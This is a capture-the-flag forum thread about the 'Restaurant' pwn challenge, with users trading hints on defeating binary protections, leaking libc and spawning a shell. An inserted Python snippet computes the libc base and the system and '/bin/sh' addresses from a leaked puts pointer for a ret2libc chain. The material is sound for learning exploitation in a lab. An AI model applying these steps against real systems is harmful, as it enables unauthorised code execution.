Official Restaurant Discussion

Official discussion thread for Restaurant. Please do not post any spoilers or big hints.

So…I’ve been on this one for a handful of hours and I’m getting the feeling I’ve misunderstood its “Easy” rating.

Is there a useful correlation between what the community rates and what I should expect to use in my own toolsets?

I ask because I’ve been writing my own code against the binaries; at first just to see if I could get the flag out of the binaries themselves, but now I’m looking at whether the host server is involved (so I’m worrying about what might be randomized).

Am I making this too complicated, just about right or…?

Same consideration for me. I’ve decompiled the executable and I have seen the vulnerability, but I don’t know how to capture the flag. Send a rev shellcode to the server maybe?

That’s what I was thinking, but knowing how compilers protect against certain mistakes (where the process suicides if testers go after them), I felt like I had left Easy…at least without using a tool. I guess I’ll try anyway / try not to trip any protections.

Did anyone manage this challenge? I need a small hint.

Hum… not that easy :slight_smile: Is the goal to inject shellcode to access the server fs? I guess… I didn’t find that much useful information in the code itself and it looks like some protections were applied. Is it a ROP challenge?

Could someone who has solved this challenge PM me? I need a nudge.

I was able to exploit this on my local machine. However, it seems like the l*bc address on the remote machine is different. Can you please give me a hint on how to discover the remote l*bc address? :smiley:

The aim of this, and typically all of the user land pwn challenges on HTB, is to make the remote process instance execute a shell (i.e. execve("/bin/sh", 0, 0);), which you will typically use to read the flag file from the filesystem. The filename of the flag is not always predictable, so don’t waste your time writing shellcode to just read the contents of a specific file. There is a separate thread specifically about pwn challenges at Pwn Challenges — Hack The Box :: Forums.

I’m happy to help anyone with a specific question about this challenge. But please tell me what you’ve done so far, where you’re stuck and what your current thoughts are.
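The post above describes the goal (get the remote process to run a shell rather than hard-coding a flag path), and several posts ask why an exploit that works locally segfaults remotely or finds a different libc address. The following is an added example, not code from the original thread or from the challenge: it shows the arithmetic step a remote exploit has to get right once it has leaked one libc pointer (for instance a GOT entry printed by puts). The symbol offsets in `LIBC_OFFSETS` are constructed placeholders, not values from any real libc build; in practice you take them from the exact libc the remote target ships (readelf -s on that file, or a libc database once you know its version), which is precisely why a local-only set of offsets produces a wrong base and a crash remotely.

```python
import struct

# Constructed placeholder offsets (NOT a real libc build). Each libc build
# has its own values; using the local machine's offsets against a remote
# target with a different libc is the classic "works locally, segfaults
# remotely" mistake.
LIBC_OFFSETS = {"puts": 0x84420, "system": 0x52290, "bin_sh": 0x1B45BD}

PAGE = 0x1000  # libc is mmap'ed at a page boundary


def parse_leak(raw: bytes) -> int:
    """Decode the bytes puts() printed for a leaked 64-bit pointer.

    puts() stops at the first NUL byte, so a canonical user-space pointer
    (top two bytes zero) arrives as at most 6 bytes followed by a newline.
    Pad back to 8 bytes and decode little-endian.
    """
    raw = raw.rstrip(b"\n")
    if not 1 <= len(raw) <= 8:
        raise ValueError(f"unexpected leak length {len(raw)}")
    return struct.unpack("<Q", raw.ljust(8, b"\x00"))[0]


def libc_base(leaked_puts: int) -> int:
    """Recover the libc load address from the leaked address of puts."""
    base = leaked_puts - LIBC_OFFSETS["puts"]
    # A misaligned base means the leak is garbage or the offsets belong to
    # a different libc build than the one the target actually loaded.
    if base & (PAGE - 1):
        raise ValueError(
            f"leak 0x{leaked_puts:x} gives misaligned base 0x{base:x}: wrong libc?"
        )
    return base


def resolve_targets(leaked_puts: int) -> dict:
    """Compute the addresses a ret2libc chain needs (system, "/bin/sh")."""
    base = libc_base(leaked_puts)
    targets = {"base": base}
    for name, off in LIBC_OFFSETS.items():
        if name != "puts":
            targets[name] = base + off
    return targets


if __name__ == "__main__":
    # Constructed sample: what puts() would print for a puts@GOT entry when
    # libc happened to be loaded at 0x7ffff7dc0000 under the placeholder offsets.
    sample = bytes.fromhex("2044e4f7ff7f") + b"\n"
    leaked = parse_leak(sample)
    for name, addr in resolve_targets(leaked).items():
        print(f"{name:>7}: 0x{addr:x}")
```

The alignment check is the cheap sanity test to run before sending the second stage: if the computed base is not page-aligned, the offsets do not match the remote libc and the ROP chain will land in the wrong place no matter how correct it was locally.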

Just did this challenge. I would only call this challenge easy, in the sense that it is fairly straightforward IF you already know the techniques to defeat the protections on the binary (unless there’s some glaring vuln that I missed :D). In my mind, the challenge is not “total beginner easy”.

DM me what you’ve tried and I’ll be happy to provide nudges.

Feel free to message me on Discord: “Alex Zander#0764” for any doubts.

Fun Challenge if you are careful and don’t make the stupid mistake I did. :slight_smile:

If, like me, you suck at pwn challenges, you’re in for a ride. It took me a bit less than a week of almost daily effort to crack that one. Maybe I didn’t do it the intended way, though, I can’t be sure. What I did seems very difficult to me but maybe I’m just the biggest noob of all time :smiley:
Anyway, understand your 64-bit architecture before jumping into this one, and, yes, it may work locally but not remotely. Google every error message you get and be patient.

That was very hard, but also very rewarding :slightly_smiling_face:

I was able to get the shell locally. However, remotely I get a segfault. Naturally, the various addresses have been changed for remote use.
What is the logic behind this?